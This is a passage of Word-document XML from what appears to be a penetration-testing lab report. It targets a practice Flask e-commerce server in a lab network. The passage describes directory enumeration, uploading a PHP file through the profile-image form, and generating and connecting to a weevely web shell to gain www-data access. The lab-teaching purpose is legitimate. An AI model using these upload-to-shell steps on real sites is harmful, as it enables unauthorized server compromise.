    <w:p w14:paraId="7D1CE167" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00A40517" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METHODS UTILIZED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580018D7" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r w:rsidRPr="006B78CD">
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Ubuntu VM, launch the web server and take note of the IP (the IP could also be scanned for from the Kali machine)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F22AF0" w:rsidRPr="006B78CD" w14:paraId="73AB0710" w14:textId="77777777" w:rsidTr="00CE3195">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16C5C3A7" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="006B78CD" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006B78CD">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BEFA573" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="006B78CD" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>cd /var/www/html/flaskecommerce</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w14:paraId="25B3ADE8" w14:textId="77777777" w:rsidTr="00CE3195">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033AEC4C" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:r w:rsidRPr="00D1320D">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0687E047" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:r>
              <w:t>Python3 run.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w14:paraId="582219D2" w14:textId="77777777" w:rsidTr="00CE3195">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79236AE5" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:r w:rsidRPr="00D1320D">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EC8CB0A" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:r>
              <w:t xml:space="preserve">Ifconfig  or  ip a </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F45694D" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="006B78CD" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0"/>
    <w:p w14:paraId="14E58AEA" w14:textId="39E6E8C2" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Next, from the kali machine, Browse to the IP of the ubuntu web server. Take a look around the site looking for any ‘POST’ options that allow for a file to be attached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EE19D" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="232732A9" wp14:editId="2E8240D6">
            <wp:extent cx="6165850" cy="1911350"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>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65850" cy="1911350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F21D1F" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Upon inspection of the site, we can see there is a page for the creation of a user account (sign in), including the ability to upload a profile image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71542D56" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="773BEE08" wp14:editId="5127970D">
            <wp:extent cx="6115050" cy="3321050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="140" name="Picture 14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able&#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15050" cy="3321050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C3ED8" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">Next a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan is run against the target IP to discover any open ports, running services, versions, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE3AF05" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76DAA828" wp14:editId="3D720FF3">
            <wp:extent cx="5727700" cy="3136900"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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7700" cy="3136900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE48C0" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">A quick web search of the discovered apache version shows the possible supported language interfaces, including python, pearl, tcl, and php. </w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidRPr="00361183">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://app.turbo.net/run/apache/apache-2.4.34</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41F9EA5B" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">Now a wordlist containing common web directory names is created and saved to the Desktop. This will be used in conjunction with dirbuster to try to get an idea of where the web server may be storing uploaded images. Many preprepared wordlists are available online. As below. (Copied and saved to desktop as dirbustwl.txt) </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidRPr="00361183">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/daviddias/node-dirbuster/blob/master/lists/directory-list-2.3-small.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA08199" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BDABC36" wp14:editId="717342C6">
            <wp:extent cx="5721350" cy="4749800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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1350" cy="4749800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47988A92" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Next OWASP dirbuster is launched from the kali terminal.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F22AF0" w:rsidRPr="00EA667E" w14:paraId="1FC8BBC2" w14:textId="77777777" w:rsidTr="00CE3195">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4208E186" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00EA667E" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA667E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69C0AD64" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00EA667E" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>dirbuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72D7C090" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0"/>
    <w:p w14:paraId="5A035244" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>The scan template is completed as below and the wordlist we prepared is attached for a list based brute force of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C77E194" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD599FE" wp14:editId="55031D13">
            <wp:extent cx="5340350" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="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40350" cy="3543300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E15D3AB" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The resulting directory structure of the webserver shows us a /static/images/ dir. It stands to reason this is where any uploaded profile pictures would be saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166605FD" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="230CF53B" wp14:editId="4328932D">
            <wp:extent cx="5378450" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0"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78450" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63007D98" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Next, a text document containing the following one line PHP script is created and saved as test.php. This will query the PHP version info on the server should PHP be supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF2363" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06A30EC7" wp14:editId="387A8B36">
            <wp:extent cx="4552950" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="0"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52950" cy="1390650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D4769" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t xml:space="preserve">Back to the registration page of the site. Complete the form requirements ensuring to attach the test.php file as the profile. Click Register. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588954B2" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503B62D2" wp14:editId="18446516">
            <wp:extent cx="6267450" cy="3022600"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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267450" cy="3022600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27830A6E" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next using the info gathered from dirbuster (static/images). Browse to 192.168.75.128/static/images/test.php. Here we can see successful upload of our script, and the version details for the installed php. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6933E8AA" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C1F1A4" wp14:editId="2B5FD0FC">
            <wp:extent cx="6642100" cy="3746500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="147" name="Picture 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642100" cy="3746500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07719F46" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Now we know this is an Apache webserver supporting PHP we can use weevely to generate a PHP shell.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w14:paraId="49AB2786" w14:textId="77777777" w:rsidTr="00CE3195">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF7E7EB" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:bookmarkStart w:id="3" w:name="_Hlk99176784"/>
            <w:r w:rsidRPr="00D1320D">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D88F1A5" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00D1320D" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:r>
              <w:t>Weevely generate ‘password’ shell.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p w14:paraId="46181EB0" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0"/>
    <w:p w14:paraId="265E2C11" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E11410" wp14:editId="76CB77D9">
            <wp:extent cx="5727700" cy="1016000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="148" name="Picture 1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7700" cy="1016000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD51C2" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Following the same steps as with the test.php file, we complete the registration form, add the newly created shell.php file as the profile and register.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C64131" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C1B3B5" wp14:editId="0DDE2D10">
            <wp:extent cx="5734050" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="155" name="Picture 1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40BFB3BE" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now browse to 192.168.75.128/static/images/shell.php to confirm the shell script has been uploaded to the server. As can be seen in the bellow screenshot, the page loads with no error verifying the success of our script upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D753D77" w14:textId="1F737284" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36373DCF" wp14:editId="004AF922">
            <wp:extent cx="5727700" cy="1873250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="156" name="Picture 1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 email&#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7700" cy="1873250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3D826" w14:textId="14A9E43C" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>Next, to interact with the shell script we again use weevely and the following command structure</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F22AF0" w:rsidRPr="00B90A7E" w14:paraId="65F0D427" w14:textId="77777777" w:rsidTr="00CE3195">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4547DC15" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00B90A7E" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D2E6E5" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRPr="00B90A7E" w:rsidRDefault="00F22AF0" w:rsidP="00CE3195">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Weevely ‘target URL’ ‘password’ </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6307CAD6" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0"/>
    <w:p w14:paraId="3CFD5872" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="574440AD" wp14:editId="707216F2">
            <wp:extent cx="5727700" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>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7700" cy="1543050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E36EC0C" w14:textId="77777777" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:t>A shell has now been created between the web server and our Kali  machine. With use of the ‘whoami’ command we can see we have www-data account access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A7201" w14:textId="145FC2C1" w:rsidR="00F22AF0" w:rsidRPr="004B2AD4" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>From here the privilege escalation exploit (</w:t>
      </w:r>
      <w:r w:rsidRPr="004B2AD4">
        <w:t>VULNERABILITY 6: PRIVILEGE ESCALATION</w:t>
      </w:r>
      <w:r>
        <w:t>) could be used to get root access. Alternatively numerous other activities can be carried out from here using weevely. We can use ‘help’ in the weevely session console to get a list of potential actions</w:t>
      </w:r>
      <w:r w:rsidR="00EA351B">
        <w:t>, as depicted below</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0AF940" w14:textId="38BF2E6B" w:rsidR="00F22AF0" w:rsidRDefault="00F22AF0" w:rsidP="00F22AF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
